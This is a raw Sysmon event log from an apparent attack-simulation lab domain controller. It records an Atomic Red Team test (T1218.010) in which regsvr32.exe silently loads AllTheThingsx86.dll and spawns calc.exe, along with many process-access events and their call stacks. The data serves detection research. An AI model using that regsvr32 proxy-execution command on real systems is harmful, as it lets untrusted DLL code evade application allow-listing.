22:12:49.882{FF16AF91-26B5-6013-0B00-00000000A401}8603460C:\Windows\system32\lsass.exe{FF16AF91-36E1-6013-7603-00000000A401}6156C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032859Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.851{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7603-00000000A401}6156C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032858Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.851{FF16AF91-26B7-6013-1500-00000000A401}14922060C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7603-00000000A401}6156C:\Windows\SysWOW64\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032857Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.851{FF16AF91-26B7-6013-1500-00000000A401}14921564C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7603-00000000A401}6156C:\Windows\SysWOW64\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032856Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-36E1-6013-7003-00000000A401}30246148C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7603-00000000A401}6156C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032855Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E0-6013-8600-00000000A401}32205052C:\Windows\system32\taskhostw.exe{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032854Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E0-6013-8600-00000000A401}32205052C:\Windows\system32\taskhostw.exe{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032853Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E1-6013-8B00-00000000A401}30366280C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032852Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E1-6013-8B00-00000000A401}30366280C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032851Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E1-6013-8B00-00000000A401}30366280C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032850Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E1-6013-8B00-00000000A401}30363108C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032849Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E1-6013-8B00-00000000A401}30363108C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032848Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E1-6013-8B00-00000000A401}30363108C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032847Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E1-6013-8B00-00000000A401}30363108C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032846Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032845Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032844Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032843Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.813{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-36E1-6013-7303-00000000A401}6248C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032842Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.812{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032841Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.812{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032840Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.811{FF16AF91-26BA-6013-2300-00000000A401}28122960C:\Windows\system32\csrss.exe{FF16AF91-36E1-6013-7603-00000000A401}6156C:\Windows\SysWOW64\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032839Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.811{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032838Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.811{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032837Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.811{FF16AF91-36E1-6013-7503-00000000A401}52605952C:\Windows\syswow64\regsvr32.exe{FF16AF91-36E1-6013-7603-00000000A401}6156C:\Windows\SysWOW64\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\System32\windows.storage.dll+1240e6(wow64)|C:\Windows\System32\windows.storage.dll+123da1(wow64)|C:\Windows\System32\windows.storage.dll+123e73(wow64)|C:\Windows\System32\windows.storage.dll+124b45(wow64)|C:\Windows\System32\windows.storage.dll+1239f1(wow64)|C:\Windows\System32\windows.storage.dll+125d40(wow64)|C:\Windows\System32\windows.storage.dll+125fbc(wow64)|C:\Windows\System32\windows.storage.dll+1258a5(wow64)|C:\Windows\System32\SHELL32.dll+1a82b4(wow64)|C:\Windows\System32\SHELL32.dll+1a818e(wow64)|C:\Windows\System32\SHELL32.dll+1a7f89(wow64) 154100x800000000000000032836Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.811{FF16AF91-36E1-6013-7603-00000000A401}6156C:\Windows\SysWOW64\calc.exe10.0.14393.4169 (rs1_release.210107-1130)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=E5F11087E724759F5A52667D22485DF5,SHA256=3F2400274E4AE8B9B6B622A0571BBD96C293A708925549495A2FF1672964E949,IMPHASH=200BD8706C36BF07F7EF1B236749FD70{FF16AF91-36E1-6013-7503-00000000A401}5260C:\Windows\SysWOW64\regsvr32.exeC:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll 10341000x800000000000000032835Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.807{FF16AF91-26B5-6013-0B00-00000000A401}860600C:\Windows\system32\lsass.exe{FF16AF91-36E1-6013-7503-00000000A401}5260C:\Windows\syswow64\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032834Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.807{FF16AF91-26B5-6013-0B00-00000000A401}860600C:\Windows\system32\lsass.exe{FF16AF91-36E1-6013-7503-00000000A401}5260C:\Windows\syswow64\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032833Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.784{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7503-00000000A401}5260C:\Windows\syswow64\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032832Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.762{FF16AF91-26B7-6013-1500-00000000A401}14922060C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7503-00000000A401}5260C:\Windows\syswow64\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032831Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.761{FF16AF91-26B7-6013-1500-00000000A401}14921564C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7503-00000000A401}5260C:\Windows\syswow64\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032830Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 